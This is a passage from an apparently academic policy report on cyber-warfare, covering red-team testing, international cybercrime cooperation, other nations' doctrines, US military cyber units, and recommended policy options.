work are outsourced to contractors or depend upon private corporations for security solutions.

Currently there is not an effective plan for oversight of government contractors and little

attention or support is given to IT fields from management. The government needs to establish a

procedure to evaluate outside contractors to ensure quality and secure technical assistance or hire

professionals for in-house IT departments. Additionally, the government agencies need to work

together to exercise buying power to leverage companies to produce more secure products, and

as a result raise security standards in private industry.

Additionally, the government needs to put a larger emphasis on testing the security of its

systems. Although the military has identified the need for actual testing, the current national

policy is void of procedures for this type of testing. Returning to historical examples of data

theft like Eligible Receiver, the government needs to hire ‘red teams’ from NSA and private

companies to deliberately test and break agency security systems. Without these unique and

realistic tests, IT departments can overlook security openings that could lead to a significant

cyber incident. However, the government must be cautious to ensure that any ‘red team’

personnel meet security standards and do not use their knowledge against the government.

107

Policy Option 6.8.5: Use best-value evaluations when selecting outside contractors.

The OMB should establish which IT contractors present the best services, and

encourage agencies to select the best contractor and not the lowest bid. Additionally,

the OMB could establish a certification system for IT contractors to complete and

show minimum proficiency.

Policy Option 6.8.6: Require regular ‘red team’ testing of any agency or private

corporation that is connected to the government network. The ‘red team’ should be a

multi-agency force that has regular turnover to ensure new ideas are constantly

applied in security testing.

6.9 US and International Cyber-warfare Collaboration

Over the past decade, international cyber-warfare has become an increasingly prominent subject

as attempted attacks on economic and social infrastructures continue to occur. One of the first

recorded attempts at international cyber-warfare happened in June of 1999 when a group that

called themselves “J18” urged people all over the world to plan individual actions that focused

on disrupting “financial centers, banking districts and multinational corporate power bases." The

group planned for the actions to coincide with the G8 convention in Cologne, Germany, and

suggested that the followers either march through the streets or hack into computer systems in

protest of capitalism. The group attracted teams of hackers from Indonesia, Israel, Germany, and

Canada that eventually attacked at least 20 companies’ computers, including both the Stock

Exchange and Barclays. By the end of the protests, more than 10,000 cyber-attacks were

recorded over a 5-hour period.232

With America highly interconnected to the rest of the world, we must be prepared to prevent and

respond to any international cyber-attack in an effective manner. This response, however, is

complicated by the trouble distinguishing between cyber-warfare, terrorism, and crime, and

appropriate responses across and through foreign borders. Systems supporting our national

defense, intelligence community, and critical infrastructures “must be secure, reliable, and

resilient – able to withstand attack regardless of the origin of attack.”233

Therefore, America’s

policy should focus on securing our own systems from international attacks, and developing a

cyber-warfare policy between ourselves and other nations.

6.9.1 United States National Security Policies

America should be concerned with two distinct forms of cyber-warfare, espionage and attacks on

infrastructure. In the former, nations or terrorist groups may attempt to steal crucial documents

during peacetime from the government, private companies, and university research centers about

232

Denning, Dorathy. "Activism, Hacktivism, and Cyberterrorism: The Internet as a Tool for Influencing Foreign

Policy." Internet and International Systems. December 1999: 101-120. 28 Oct. 2007

<http://www.nautilus.org/gps/info-policy/workshop/papers/denning.html> 233


<http://www.whitehouse.gov/pcipb/priority_5.pdf>

108

information systems and key target locations, as well as “lace our infrastructure with ‘back

doors’ and other means of access” designed for future use.234

On the other end of the spectrum,

during wartime our adversaries can potentially attack critical infrastructures in order to

intimidate and erode public confidence in information systems.235

They could also attack the

Department of Defense (DoD) and the intelligence community in an attempt to slow the U.S.

military response. Due to such a wide range of possible attacks, the U.S. government stated that

it must be able to protect infrastructures that are considered “national security assets.” It also

believes that we must develop the capability to quickly identify the attackers.236

The following

outlines the policies needed to fulfill these goals.

6.9.1.1 Securing the Nation’s Cyberspace

One of the largest problems that our nation faces today in attempting to secure cyberspace is the

data mining and intelligence collection against the United States government, critical

infrastructure companies, and educational research facilities. To date, almost no true

counterintelligence technologies have been developed. Therefore, the United States must first

work to better understand our enemies’ capabilities, and in turn the FBI and intelligence

community will be able to develop and implement stronger forms of counterintelligence.237

In addition to working with underdeveloped counterintelligence abilities, the Department of

Defense, intelligence community, and law enforcement agencies are unable to quickly trace the

source of the cyber-attack, assuming that the person or group can be traced. Therefore, the

government should work to promote better attribution technologies so that the previously listed

groups are able to easily and quickly identify the culprit and take action if necessary.

Preventative techniques are also lacking and must be better developed in order to protect critical

systems and infrastructures.238

Although the DHS has created several agencies for incident reporting and interagency

communication, cyber-attacks still fail to reach the proper agencies. Therefore, the United States

must develop a better network and system for distributing reported incidents throughout the

various defense, law enforcement, and national security agencies depending on the nature of the

cyber-attack. The National Security Council and the Office of Homeland Security are leading

research to ensure that the proper technologies and procedures are in place so that these attacks

can easily be distributed to the proper agency. 239

234



Ibid. 236

Ibid. 237

Ibid. 238



Ibid.

109

6.9.2 United States International Policies

Not only must America work towards improving our own security and detection systems, but it

will also need to work with nations all over the world in order to secure the global cyberspace

and economy. To date, relatively little has been done to globally advance the idea that all

nations should work together to secure our world market. The policies and general plans to

accomplish international security are outlined below:

6.9.2.1 Utilize International Organizations to Promote a Global “Culture of Security”

Due to our nation’s infrastructure being directly linked with Asia, Canada, Europe, Mexico, and

South America, the United States has a vested interest in securing global cyberspace. The global

economy increasingly depends on the vast information networks that connect markets and

multinational corporations. Because the world is becoming so interconnected, America needs to

push for a global “culture of security” in order to protect every nation’s international economy.

Countries must work together for this goal, because “the vast majority of cyber-attacks originates

or passes through systems abroad, crosses several borders, and requires international

investigative cooperation to be stopped.”240

Because of the international participation needed to fulfill this goal, the United States is

determined to work with other nations to help raise awareness, share ideas and defense

technologies, and prosecute all who engage in cyber-crimes in order to maintain the highest level

of integrity within global information networks. Up to this point in American cyber-warfare

policies, the government has worked with public international organizations such as the

Organization of Economic Cooperation and Development (OECD), G-8, the Asia Pacific

Economic Cooperation forum (APEC), and the Organization of American States (OAS). The

government has also worked with organizations in order to help coordination within the private

sector, such as the Transatlantic Business Dialogue.241

6.9.2.2 Develop Secure Networks

In order to develop secure networks, the United States urges that international technical

standards for these systems be developed and adopted so that every nation has a base level of

security. In turn, this baseline would make the entire global market and information systems

more secure. The government will also facilitate the collaboration and research between the

world’s top scientists and researchers. Additionally, the government will encourage American

industries to engage with their foreign counterparts in an attempt to both make a business case

for cyber-security and develop a plan for successful partnerships with governments. 242

240




<http://www.whitehouse.gov/pcipb/priority_5.pdf>. 242

Ibid.

110

6.9.2.3 Promote North American Cyberspace Security

Although global cyber-security is a high priority in this field, the United States must first secure

North American cyber-assets before focusing on the rest of the world. Therefore, the

government should look to cooperate with Canada and Mexico in order to form a strong “Safe

Cyber Zone.” This zone will be accomplished by identifying all networks that the three

countries share and solving the security issues that exist between the borders.243 In turn, the “Safe

Cyber Zone” will provide for a strong defense system no matter where an attack originates.

6.9.2.4 Establish International Network of Agencies for Information Relay

The United States encourages all nations to appoint a single organization that will inform

governments and public all over the world of cyber-attacks or viruses. The U.S. government also

calls for larger organizations, such as the European Union, to create information hierarchies. By

creating such a network, the increased amount of information being shared about these attacks

will make defense research easier. Another way in which an international communications

network could improve both defense and defense research is if each country were to develop a

system that would automatically inform its government agencies, the public, and other nations

about impending cyber-attacks or viruses. 244

6.9.2.5 Encourage Other Nations to Follow the Council of Europe Convention on Cyber-crime

The United States has signed and put into effect the Council of Europe Convention on Cyber-

crime (described below), and encourages other nations to both sign and abide by the treaty, in

turn helping other nations find and prosecute the criminal offenders.245

6.9.3 International Cyber-security Collaboration

In November of 2001, the Council of Europe held the Convention on Cyber-crime in which a

treaty was completed and signed by 39 European countries, as well as Canada, Japan, South

Africa, and the United States. The treaty establishes that all countries part of the collaboration

will work together in order to help investigate any cyber-crime that may be coming from one’s

respective country, similar to the American policy outlined above. This can be seen in the treaty

when it says, “Believing that an effective fight against cyber-crime requires increased, rapid and

well-functioning international co-operation in criminal matters.”246 The treaty continues this idea

243



Ibid. 245

Ibid. 246

Convention on Cybercrime. Council of Europe. 23 Nov. 2001

<http://conventions.coe.int/Treaty/Commun/QueVoulezVous.asp?NT=185&CL=ENG>

111

of cooperation by establishing the idea that legitimate interests in information technologies

should be protected when cooperating with other nation states. In other words, all nations should

respect the distinction between private and public information, allowing defense companies who

are developing new cyber-warfare technologies the opportunity to succeed by selling the

products instead of having the information leaked to the public.

The United States initially signed this document in November of 2001, when it was first written.

However, it has just been ratified and put into effect within the past year. 247 Therefore, the

government should strive to use and enforce the policies agreed upon in the document so that

global cyber-security and international prosecution of criminals both improve.

6.9.4 International Policies

Although no explicit cyber-warfare policies have been found for other nations, we have an idea

of how some view the use of the internet as a weapon. Some countries, such as the United

Kingdom and Germany, have relatively similar views as the United States. However, others’

ideas such as Russia and China differ from our nation’s policies in retaliation efforts and future

military practices, respectively.

6.9.4.1 United Kingdom

The United Kingdom has very similar views to the United States in regards to cyber-warfare

policy. They believe cyber-warfare to be actions that affect others’ information systems in

support of national objectives. Also included in their definition of cyber-warfare is the defense

of one’s own infrastructure and systems via the internet. The UK is even a step ahead the United

States government in the sense that they are using legal framework that already exists that they

believe can be applied to cyberspace attacks. In other words, the British are now treating any

cyber-attack on a person or company as a crime that is prosecutable if the culprit is found. In

order to help find attackers, the Regulation of Investigatory Powers Act 2000 (RIP) was created

to allow the government to intercept and read e-mail, as well as force someone to decrypt

personal files. The British believe that this will help “combat the threat posed by rising criminal

use of strong encryption,” and have even promised that the program will not get out of hand due

to an independent overseer of the powers of RIP. 248

6.9.4.2 Germany

In general, the German perspective of cyber-warfare policy is similar to that of the United States

and the United Kingdom. However, the Germans do have a couple ideas that differ from

American policy. The first of which considers the management of the media as “an element of

information warfare.” This means that if anyone were to try to control any form of German

media, it will be seen as an act of war against the country. Also, due to a reported case of

247

Ibid. 248

http://www.fas.org/irp/crs/RL30735.pdf

112

industrial espionage by the French that cost the German economy significant losses, their

government is considering the use of economic cyber-warfare as a means of keeping enemies on

a level playing field.249

This does not mean, however, that they intend to use this as an offensive

measure. Instead, it will simply be used while in conflict with another nation as a way to help

end the dispute.

6.9.4.3 Russia

The Russian view of cyber-warfare is drastically different than that of the American government.

In fact, many Russians argue that cyber-warfare is the second most dangerous attack, the first

being a nuclear attack:

From a military point of view, the use of Information Warfare against Russia or

its armed forces will categorically not be considered a non-military phase of a

conflict whether there were casualties or not . . . considering the possible

catastrophic use of strategic information warfare means by an enemy, whether

on economic or state command and control systems, or on the combat potential

of the armed forces . . . Russia retains the right to use nuclear weapons first

against the means and forces of information warfare, and then against the

aggressor state itself.250

They also believe that the goal for “competing sides” is to gain complete control of the other’s

information systems, decision making processes, and even populace.251

Some Russians have

even said that computer viruses can be used as “powerful force multipliers” when in conflict

with another entity. All of this shows the dire need for international cooperation in securing the

global infrastructure and economy. If Russia successfully took out another country’s critical

infrastructure or banking systems the country would be effectively destroyed, not to mention the

effect it would have on the global economy. Therefore, the American government must follow

through with the International Cyber-security Collaboration (Sec. 6.9.3) and lead the path in

developing strong defense capabilities for the entire world. An international treaty could also be

constructed in order to lay out rules of engagement in regards to cyber-warfare.

However, it must be noted that Russia has also enacted laws against any form of cyber-attack

and has made its intentions clear that the aggressor will be investigated and prosecuted. Because

their government has made these laws, Russian comments of nuclear retaliation can possibly be

seen as threats, but they must also be taken with heed and international cyber-security must be

increased.

249

Hildreth, Steven A. “Cyberwarfare.” CRS Report for Congress. June 19, 2000.

<http://www.fas.org/irp/crs/RL30735.pdf>. 250

Ibid. 251

Lester W. Grau and Timothy L. Thomas. “A Russian View of Future War: Theory and

Direction,” The Journal of Slavic Military Studies. Issue 9.3 (Sept. 1996), pp. 501-518.

113

6.9.4.4 People’s Republic of China

China is another country that demonstrates the need for international collaboration in defending

our cyberspace. Over the past decade, its military has aggressively developed cyber-warfare

technologies and has incorporated these technologies into its military organization, doctrine, and

training. The large push towards information warfare stems from its country’s indigenous

modern and ancient concepts of how to conduct war, the People’s War concept and the 36

Stratagems, respectively. Their warfare is based around “deception, knowledge-style war, and

seeking asymmetrical advantages over an adversary.252

” Because of the Chinese theories on

gaining lop-sided advantages, the international need for cyber-defense is even more apparent. If

China were to attack a weaker country with limited cyber-security, it would potentially be able to

take over every aspect of their infrastructure, similar to Russia’s attack on Estonia.

The Chinese have also been pursuing the idea of a Net Force that would consist of thousands of

computer professionals who have all been trained at various universities and training facilities. It

has also been reported that several large scale cyber-training seminars have been held since

1997.253

Due to China’s obvious efforts to gain military dominance through cyber-warfare, the

United States military should begin to contract its own computer experts in order to develop the

technologies needed to protect both our allies and ourselves against any attacks no matter the

source.

6.10 Military Policy

As the global balance of power continues to shift, it is crucial that the United States military stay

ahead of foreign powers, especially in the area of cyber dominance. Although cyber dominance

includes electronic warfare, this policy analysis will be primarily limited to cyber-warfare only.

6.10.1 Current Military Cyber Units

Although cyber threats have existed for most of a decade, the military has been slow to respond

in the form of specific military units designated to respond to the growing arena of cyber-

warfare. Initially cyber-warfare was lumped under Space Command, but as of year 2007 the 8th

Air Force was designated Cyber Command, an independent command charged with compiling

the resources and personnel required for the new theatre of war. The new mission of the Air

Force as stated by Secretary of the Air Force Michael W. Wynne is to “fly and fight in air, space,

and cyberspace.”254

252


<http://www.fas.org/irp/crs/RL30735.pdf>. 253

Ibid. 254




114

Before delving into policy recommendations for the military, it is important to briefly describe

the current divisions of cyber-warfare in existence. Cyber-warfare is grouped under the large

umbrella of Information Operations (IO), which is any action designed to disrupt enemy

information systems while protecting your own system. Sub-groups include Psychological

Operations, Military Deception, Operational Security, Computer Network Operations, and

Electronic Warfare. While all groups deal with the electromagnetic spectrum, the Computer

Network Operations (CNO) is the group specifically tasked to cyber-warfare.255

Under CNO are three main components: Computer Network Defense (CND), Computer Network

Exploitation (CNE), and Computer Network Attack (CNA). CND’s mission is to defend

network systems against disruption, intrusion, or destruction. Additionally, they monitor any

aggressive activity and intrusions, which they attempt to prevent through passive measures such

as firewalls or more aggressive actions such as determining enemy capability before they can

attack the military system. CNE is an emerging section that tries to penetrate enemy systems to

determine vulnerabilities in order to plan strategy against various enemy targets. Lastly is CNA,

which uses digital signals to enter and control or destroy enemy computer systems.

6.10.2 Military Uses of Cyber-warfare

To date, there are no known cyber-attacks perpetrated by the US military. However, the military

has debated using cyber-warfare in the most recent military actions – Kosovo and Operation

Iraqi Freedom. In both cases the military had defined plans for attack, but were worried about

potential side effects of the attack as well as rights violations under the Geneva accords,

specifically the restriction against targeting civilian populations. There was concern, especially

in Iraq, that using cyber-attacks could cause cascading failures that would destroy the economic

systems of the country and hurt the population. Iraq’s banking system was connected to Europe

while internal military and civilian systems were closely integrated. US officials ultimately

decided against cyber-attacks because of the inability to only target Iraqi military and not hurt

both Iraqi civilians and Europeans.256

Although there is no evidence of cyber-attacks in Kosovo,

there appeared to be a cyber tactic used against Serbian air defense systems, although exactly

what the attack was is still uncertain.257

6.10.3 Future of Cyber-warfare in the Military

As both civilian populations and foreign militaries become increasingly reliant upon technology,

the military will play an increasing role in national defense and begin to integrate offensive

operations into global strategy. In that aim, the military should undertake or further develop four

areas: create national defense strategies against foreign nations, continue to expand cyber units

and cyber education, and involve the private sector in development and research while

continuing to develop offensive capabilities using cyber-warfare.

255

Ibid. 256

Ibid. 257


<http://www.pbs.org/wgbh/pages/frontline/shows/cyberwar/interviews/arquilla.html>

115

Since the end of the nineteenth century our nation has developed military strategies for various

nations in case of the outbreak of war. As we move into the cyber-age, we must integrate cyber-

attacks into the national strategy, but also be wary of foreign cyber-attacks. Just as every country

requires different physical military responses, various nations will require more sophisticated

strategies that will need to avoid cascading damages that could result from a poorly managed

attack. Although China appears to be our greatest adversary, the military cannot be short sighted

and fail to examine capabilities of other nations as well as terrorist groups.

As the role of cyber-warfare grows in national planning, the military needs to grow in personnel.

As previously mentioned, this year saw the formation of a Cyber Command, as well as the

introduction of new job codes specifically for cyber units in the Air Force.258

These job codes

create a specific cyber job title, with the airmen working on cyber activities for the entirety of

their career. This will not only provide a dedicated job force, but also increase the education and

ability in the command.

Additionally, the military has increased efforts in cyber education. The Air Force offers a ten

week cyber boot camp for officer candidates as well as civilian university students that focuses

on both the means of cyber-attacks and the legal and political issues regarding cyber-warfare.

The Department of Homeland Security and National Science Fund are sponsoring two year

scholarships for students in cyber-warfare on the condition that recipients must then work with a

government agency for two years following graduation. Due to the cyber boot camp, Syracuse

University has begun to offer courses in cyber defense in local high schools. Over 148 high

schools in the north east have cyber classes that offer college credits if successfully completed.259

Since 2000, small groups of cadets at West Point, the Naval Academy, and the Air Force

Academy would build small networks that would then be tested and broken by NSA hackers.260

While these steps are beneficial, education must be further expanded in the coming years.

Although the military has made great strides in recent years in identifying the threat of cyber-

warfare, it is still in the beginning stages of offensive cyber capabilities. Cyber-attacks were not

used in previous engagements in part because of the uncertainty of the potential effects of their

attacks. Rather than developing cyber capabilities similar to a cluster bomb, the military needs

precision offensive capabilities to attack specific targets with low risk of civilian damages. A

clear contrast can be made in regard to the first Gulf War. During the course of our bombing

campaign, the US military targeted both water treatment plants and key electrical infrastructure

as part of the strategy to force Iraq out of Kuwait. Following the war, the lack of a functioning

sanitation system led to 110,000 civilian deaths compared to 3,500 deaths during the course of

the war. With the right technology, the US military could have instead disrupted the plants and

destroyed them electronically to achieve the same military objectives. However, the cyber

258

Shane, Leo III, (2007). “AF Taking Careers into Cyberspace” 30 October, 2007,

<http://www.military.com/features/0,15240,152400,00.html?wh=benefits> 259



bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?> 260

Krebs, Brian, (2003). “Cyber War Games Tests Future Troops” Washington Post, October 30, 2007.

<http://www.washingtonpost.com/ac2/wp-dyn/A21871-2003Apr23>

116

damage could be such that simple repairs could restore the systems and prevent the mass loss of

life.

In the endeavor to further develop cyber tools, the military has begun to seek outside help in both

development and testing. Earlier in the year both the Air Force and Army solicited assistance

from the computer industry in developing offensive capabilities.261

Currently the Pentagon is

regularly tested by NSA ‘red teams’ for security holes, a job that could also be given to outside

contractors who may have a different tact that would present other potential weaknesses.

Defensive capabilities are necessary to protect the nation, and it is vital for future military

operations to further develop offensive capabilities, and integrate cyber-attacks as key tools in

combat.

Policy Option 6.10.1: Continue to integrate cyber-warfare into national strategic

planning, especially in the areas of growing the military and creating or redefining the

mission of the military. This would include increasing the number of units dedicated

to cyber-warfare, and expansion throughout the cyber domain.

Policy Option 6.10.2: Increase funding for cyber education, both in the civilian and

government sectors. Expanding cyber-warfare training in the military would result in

more effective troops, and the civilian sector could offer outside aid and ideas for the

military.

Policy Option 6.10.3: Develop specific national strategies for use of cyber-warfare,

both offensively and defensively, against nations and terrorist organizations. These

policies should focus on the capabilities of foreign powers, as well as specific

technologies that could exploit enemy defenses or thwart their offensive capabilities.

Any technology discussed in these reports should be fully researched to achieve its

maximum effect.

6.10.4 Policy Questions

While the military seeks to improve its defensive capabilities, there are significant policy

restrictions that hamper effective cyber operations. In March of this year Marine Gen. James

Cartwright, commander of the Strategic Command, told the House Armed Services committee

that the nation needed more than passive defensive measures in regard to cyber-warfare. He

commented that although the military was positioned to prevent lower level hacking, focusing on

network defenses amounts to little more than a modern Maginot Line. Instead, Gen. Cartwright

asked the Congress to help solve technical and legal international issues that restrict cyber

capabilities of the military.262

261

Brewin, Bob (2007) “Army, Air Force seek to go on offensive in cyber war” 30 October, 2007.

<http://www.govexec.com/story_page.cfm?filepath=/dailyfed/0607/061307bb1.htm> 262 “STATEMENT OF GENERAL JAMES E. CARTWRIGHT COMMANDER UNITED

STATES STRATEGIC COMMAND BEFORE THE HOUSE ARMED SERVICES

COMMITTEE ON UNITED STATES STRATEGIC COMMAND 21 March 2007” 30 October,

2007 <http://armedservices.house.gov/pdfs/FC032107/Cartwright_Testimony032007.pdf>

117

Essentially, the United States is unable to conduct any cyber actions legally without foreign

cooperation. The investigation into the source of cyber-attacks such as Titian Rain is stalled due

to Chinese refusal to cooperate with investigations. Through vigilante type assistance, the

government has civilians who try to work outside of the legal framework to monitor and track

foreign hackers, and even managed to trace the Titan Rain hackers to a specific router in China.

However, without international agreements or cooperation, the investigative trail is cut off.263

Additionally, there is the potential for US cyber-activity to create an international incident

similar to other intelligence activities. What would the ramifications be if military monitoring or

hacking was detected and proven by China or another antagonistic government? A more

interesting question is what would be the response from an ally nation if we were monitoring

them as well? Also, what is the line before a cyber activity violates the law of Armed Conflict

against another nation? Other questions include the appropriate response to an internal, civilian

attack, as well as the possibility of using a neutral party to route cyber activity.264

Although there is not a clear answer to these questions, they are policy issues that should be

discussed both in congress and abroad as an international community. As new weapons come

onto the scene, international cooperation has determined the effectiveness and appropriateness of

these weapons, and banned cruel and inhumane weapons. Unfortunately, it usually requires a

war or widespread use of a technology before policy is adopted – but can we afford to allow a

debilitating cyber-attack before we determine international standards for action?

Policy Option 6.10.4: Establish an international convention regarding cyber-warfare,

possibly through the United Nations. Work to establish legal framework for the

tracking and use of cyber-attacks, as well as classifications of cyber-attacks. From

these classifications (military, terrorist, criminal, etc.) establish protocol for

international sanction (if necessary) and rules of engagement or retribution.

Cyber-warfare is the next battlefield, one that the military has acknowledged and is starting to

include in both defensive and aggressive planning. The military must further both offensive and

defensive operations, as well as develop a culture in the military that acknowledges the use and

effectiveness of cyber attacks, as well as the potential for widespread destruction. Increased

education programs and cooperation with the public sector will bring the best and the brightest to

turn a potential weakness into another area of US dominance.

263






118

7 Conclusion

119

7.1 Is Cyber-warfare a threat?

This assessment began with the hypothetical scenario of Chicago being permanently evacuated

due to nuclear radiation and the Mississippi River being contaminated and full of sewage.

Clearly, this is the worst case cyber-warfare scenario, not the most realistic. However, the

vulnerabilities discussed throughout the paper show that the scenario’s individual components

are within the realm of possibility.

As a nation, should we be concerned by cyber-attacks? It is known that cyber-attackers could

potentially compromise elements our critical infrastructure and steal sensitive government data.

Foreign nations are preparing for a cyber-war, with the threat of disabling entire military units.

On the other hand, the actual effects of many of these cyber-attacks are limited in scope. Data

stolen to date has not been classified information, aircraft can be flown without catastrophe even

without guidance from air traffic control networks, and many economic and social consequences

are short-term in nature. On the other hand, successful large-scale attacks on the power sector

could be extremely costly, but may not be feasible in the near future. But can we dismiss these

threats or should we place them as a high national priority?

Ultimately, the answer is mixed. Our vulnerability to cyber-attacks is clear, especially seeing

that the means of attack are so readily accessible. An increasing reliance on computer systems

will only expand our vulnerability, especially in areas such as the military that are not yet fully

dependent upon networked systems. However, this vulnerability does not translate into the

doomsday scenarios that many suggest. At present, a large-scale cyber-attack would almost

certainly be part of a larger conventional attack, in which the cyber-attack would simply be used

to make an already catastrophic event worse. We are threatened as a nation, but we do not have

a crisis on our hands yet, and a future crisis can be prevented by taking wise policy steps now.

With better implementation of established cyber-security practices, along with proactive research

and development, we can reduce the glaring weaknesses in our cyber-defense and mitigate the

vast majority of cyber threats.

7.2 The Way Forward

Action must be taken to counter the current and future threat of cyber-warfare. The federal

government should continue to advance the broad policy objectives outlined in the NSSC and

additional measures should be enacted to fill gaps that have become evident in the current policy.

We have compiled our suggested “best policies” to fill these gaps.

7.2.1 What Can Be Done Now

Our research has shown that there are no significant barriers to keep the Unites States

Government from implementing the following policies and actions immediately:

Create more severe standards for sentencing convicted cyber-criminals.

120

Increase federal funding for the US-CERT bulletin and Stay Safe Online, specifically for

the marketing initiatives to inform the general public.

Require the IT departments of government agencies to document the structure of their

computer systems and their installation of security patches.

Expand cyber-warfare training within the military and at universities to make our Armed

Forces more skilled in cyber-warfare tactics.

7.2.2 Policies for the Near Future

The following policies and actions should be given immediate consideration, but will take some

time to develop. Our suggested timeline for implementing these suggested policies and actions

would be two to five years:

Create a uniform cyber-security licensure and certification process, which could help to

ensure the proper level of training for IT professionals.

Create a uniform cyber-security testing procedure for federal agencies and contractors

that is able to constantly evolve with new challenges. Creating a federal “red team” of

security testers that periodically tests the cyber-security vulnerabilities of government

computer systems would help with the evolution of cyber-security.

Enact policies to encourage other nations to prevent cyber-attacks from originating within

their borders.

Work with other nations to adopt a set of international cyber-security standards to be

followed, to ensure all international computer systems have a minimum level of security.

One starting point in a global cyber-security policy could be the creation of a regional

North American cyberspace “safe zone”, in which the U.S. would work with Canada and

Mexico to ensure the countries work to solve mutual cyber-security issues.

Integrate policies related to cyber-warfare tactics into national strategic planning and any

future discussions of redefining the military’s mission.

Create a legally binding set of security requirements for software and hardware. Such a

law will need to be abstract enough to accommodate the evolving nature of threats and

should balance added security with added costs.

121

7.2.3 Future Research

The following policies and actions will need extensive research and time before implemented. A

general timeframe for putting into practice the following policies would be approximately ten

years.

Establish a widely accepted international treaty or agreement to create a global cyber-

security policy, a framework for interagency cooperation and legal response, and an

international network of agencies for sharing information.

Establish a cyber-warfare equivalent to the Geneva Convention to establish rules for

military use of cyber-warfare tactics.

7.2.4 Conclusion

These “best policies” are a framework based on our research that must be further developed.

Special attention should be paid to increasing overall awareness of the issue of cyber-warfare.

This would help increase the emphasis placed of cyber-security in both the private and public

sectors, including international corporations. Increased awareness could stimulate research and

development, spread concerns of cyber-security from IT departments to boardrooms, and help

the private sector understand that stronger cyber-security measures are a financially sound

undertaking. However, the government must be sure to balance regulation and legal

enforcement of the private sector’s cyber-security with the economic costs that would result.

One balanced option is to use financial incentives to encourage change.

Although there is never an impenetrable defense, the United States can greatly limit the threat of

cyber-warfare over time with more robust cyber-security policies that are able to adapt and

evolve to the changing times.

122

8 Appendix

123

8.1 Policy Options

Below are the assembled policy options outlined in the report.

Policy Option 6.5.1: Require by law that all computers be secured in specific ways.

A policy that demands all systems be secured is a tempting idea, but carries with it

many consequences. Explicitly defining which precautions to make about cyber-

security increases government encroachment on individuals and if worded

improperly could actually make computers less secure. Diversity is an important part

of system protection, which a law explicitly demanding specific security precautions

might eliminate, and actually giving attackers more potential targets. A law

requiring security precautions would need to be worded in abstract terms to allow for

the diverse systems which currently exist. Specific security measures required by law

might raise the cost of computers and reduce the performance of the technology.

Defining a bare minimum of precautions that must be taken might lead to fewer

systems protecting themselves beyond that minimum. It may be possible to create a

law which requires certain precautions with minimal negative side effects that could

reduce vulnerability, but such a law would have to be created very carefully.

Policy Option 6.5.2: Change the policies about liability for software makers and/or

system administrators.

A policy might be drafted which could hold system administrators responsible for

damage caused by their systems. The law would give administrators a larger

motivation to secure their systems so that attackers could not commandeer them and

execute attacks. In a way, administrators are already responsible for their systems,

because security breaches under their watches tend to hurt their careers, so the

necessity of this policy is debatable. Changes in liability rules would increase the

stress put on those with increased responsibility, possibly raise the cost of their

service and reduce the number of people willing to take the risk of working to protect

networks. In some limited systems, changes in liability rules might be more

appropriate than others. For example, administrators responsible for maintaining

networks controlling critical infrastructures or connected to extremely high-capacity

Internet links might deserve more legal motivation to secure their systems than

owners of personal computers.

Applying new responsibility to software developers would slow down the

development process and increase the cost. Software prices would rise to offset the

legal costs relating to new liabilities, while programmers would be under legal

pressure to secure their products, possibly at the expense of performance. The private

sector already has motivation to secure its products, but perhaps is not as concerned

as it should be that flaws in one system can be used to cause damage to the systems

of others. Certain violations of software security might be more appropriate to hold

developers responsible for than others; it may be possible to make adjustments in

liability rules which improve security with minimal impact on the cost and

performance of software. Imported software and outsourced developers would also

124

have to be taken into consideration in any policy about the liability of software

developers.

Policy Option 6.5.3: Create programs to approve security products and personnel.

Institutions exist for the licensure of many different professionals and the approval of

different products which might be similarly created to address cyber-attack

possibilities. Policy makers can expect debates over whether government or the

private sector can better provide cyber-security approval services. Having a

compulsory form of certification may be helpful, since current methods of approving

software and personnel for security still allow for false products and charlatan

professionals to exist. A government approval process for allowing individuals to

practice securing systems would have to be carefully crafted by experts to insure that

certified individuals are qualified for their positions. Creating new institutions would

be costly, and defining the specific software packages and personnel under their

jurisdiction would be difficult, but having more qualified security personnel and

higher quality defense products would be helpful.

Policy Option 6.5.4: Federally demand a minimum level of security for critical

infrastructure systems.

In 2001, the Energy Information Security program was created in an attempt to

develop better defense technologies for our nation's critical infrastructures. Due to

the difficulty of and the time needed for installing these technologies, many

companies have not kept their systems up to date. Because they are not properly

secured, it leaves even the "secured" infrastructure companies vulnerable to attack

simply due to them being connected to the same network as the unprotected

companies. Therefore, the minimum level of security for our nation's infrastructure

must be federally regulated so that the United States' power utilities, water lines,

communication systems, and emergency response will not fail due to a "weak link" in

their network connections.

Policy Option 6.6.1: Create a more forceful and concentrated effort to prosecute

cyber-criminals to the full extent of the damage they caused. It is dangerous to allow

criminals who have caused millions of dollars in damage to be allowed to access

computer systems after only a few years of imprisonment. Additionally, minimum

and maximum sentences need to be increased to reflect the widespread damages

caused by cyber-attacks.

Policy Option 6.6.2: Apply a more concrete method of analyzing cyber-attacks in

such a way that a general audience is able to comprehend. This will be useful in

enhancing the quality of communication between the government and its citizens.

Policy Option 6.6.3: Allow incentives for private sectors in their own attempts to

secure their networks. Due to the lack of profit directly resulting from securing their

cyber-space, private companies do not see the benefit in taking the initiative to

prevent cyber-attacks on their own system. If the government were to provide

incentives or prominent recognition of companies who successfully work to secure

125

themselves, private sectors will be more likely to conform to the government’s view

of cyber-security.

Policy Option 6.6.4: Attempt to increase communication not only with home users

and small businesses, but also with other nations. A better response to cyber-attacks

is dependent on increased communication and analysis of attack trends. Opening up

an international dialogue related to cyber-attacks could prepare the US government

and citizens for possible future attacks.

Policy Option 6.6.5: Establish a network in which local police and firefighters are

able to coordinate effective response systems in regards to local cyber-attacks. For

example, have a hotline for businesses and computer users to have access to in case of

a cyber-attack. The difficulty with this policy is finding a way to communicate in case

telecommunications were disrupted as well. Perhaps the most reliable method is to

create a useful two-way radio between departments that could be accessed by heads

of Information Technology departments at companies as well.

Policy Option 6.7.1: Increase advertisement funding for the federally-managed

websites and email lists described above. These websites have the potential to

increase public awareness, but are not receiving the traffic needed to make an impact.

Advertising them more vigorously would improve their public exposure.

Policy Option 6.7.2: Create greater incentives for small businesses to inform their

employees of cyber-security concerns. For example, small businesses could receive

tax credits if a certain percentage of their employees subscribe to US-CERT’s e-mail

Policy Option 6.7.3: Provide tax incentives for enterprises whose employees undergo

an educational cyber-security course. As in the case of small businesses, this could

be an effective way to increase awareness of secure computing practices among

individual workers.

Policy Option 6.7.4: Work with private industry to create a standardized set of

essential skills for IT professionals in the area of cyber-security, for the purpose of

creating a certification program. If such a standard were created, the IT professionals

responsible for designing and maintaining companies’ internal computer systems

Policy Option 6.7.5: Accompany existing efforts to encourage electronic submission

of shipping manifests with efforts to encourage safe and secure handling of the

